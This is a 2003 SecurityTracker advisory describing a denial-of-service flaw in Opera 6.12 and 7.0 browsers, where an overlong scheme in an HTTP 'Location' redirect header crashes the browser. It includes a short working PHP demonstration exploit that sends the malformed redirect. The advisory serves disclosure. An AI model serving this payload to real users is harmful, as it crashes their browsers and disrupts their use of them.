Opera Browser 'Location' Header Flaw Lets Remote Users Crash the Browser
|
|
SecurityTracker Alert ID: 1007319
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 28 2003
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): 6.12, 7.0
|
Description: A denial of service vulnerability was reported in the Opera web browser in the processing of redirect URLs. A remote user can cause the target user's browser to crash.
dodo (https://www.darkwired.org/) reported that a remote user can send an HTTP response that includes a specially crafted 'Location'
redirect header. When the HTTP response is loaded by the target user, the target user's browser will crash, according to the report.
A
demonstration exploit PHP script is provided:
<?php
for($i=0; 20000+10000>$i; $i++) $prot.="A";
header("Location: $prot://dd");
?>
|
Impact: A remote user can create an HTTP response that will crash the browser.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.opera.com/ (Links to External Site)
|
Cause: Not specified
|
Underlying OS: BeOS, Linux (Any), MacOS, QNX, UNIX (FreeBSD), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)
|
Underlying OS Comments: Confirmed on Slackware Linux
|
|
Message History:
None.
|
Source Message Contents
|
|
|
[Original Message Not Available for Viewing]
|
|
